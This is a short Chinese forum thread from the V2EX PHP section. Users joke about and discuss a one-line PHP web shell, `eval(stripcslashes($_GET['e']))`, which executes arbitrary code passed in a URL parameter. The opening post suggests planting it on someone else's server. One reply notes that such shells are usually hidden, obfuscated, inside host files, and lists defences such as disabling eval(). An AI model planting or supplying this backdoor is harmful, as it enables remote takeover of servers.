首页
注册
登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请
登录
V2EX
›
PHP
一句话的代码竟然有这么强的攻击性。对服务器来说是致命的。
liyandong
·
2013-01-02 00:09:54 +08:00
· 4862 次点击
这是一个创建于 4454 天前的主题,其中的信息可能已经有所发展或是发生改变。
放到别人服务器,攻击性的大小就由你自己决定了。
<?php
eval(stripcslashes($_GET['e']));
http://www.oschina.net/code/snippet_173183_13710
我看了笑了~~~
攻击性
服务器
stripcslashes
6 条回复
•
1970-01-01 08:00:00 +08:00
1
for4
2013-01-02 00:27:03 +08:00
笑点在哪里..~?
2
liyandong
OP
2013-01-02 00:39:01 +08:00 via Android
1
oschina评的论
@
for4
3
tempdban
2013-01-02 01:25:27 +08:00 via Android
确实啊写完楼都垮了
4
for4
2013-01-02 01:38:04 +08:00
@
liyandong
发现我太纯洁了, 完全没发现原来这个网页还有"下半身"...
5
enj0y
2013-01-02 13:49:41 +08:00
更多的做法是将一句话混淆隐藏在宿主PHP或者其它文件里,接受到事先备好的电话号指令后释放出来。防不胜防啊!想禁一句话,最好的办法是禁eval()和使用外部储存服务,然后关闭本地WEB写权限。
至于OSC上面的,烧主板、堵厕所嘛的,全是恶搞。
6
enj0y
2013-01-02 13:50:43 +08:00
@
enj0y
字打错了, eval(last.post.replaceStr("电话号","好"));
关于
·
帮助文档
·
博客
·
API
·
FAQ
·
实用小工具
·
2072 人在线
最高记录 6679
·
Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 21ms ·
UTC 16:13
·
PVG 00:13
·
LAX 09:13
·
JFK 12:13
Developed with
CodeLauncher
♥ Do have faith in what you're doing.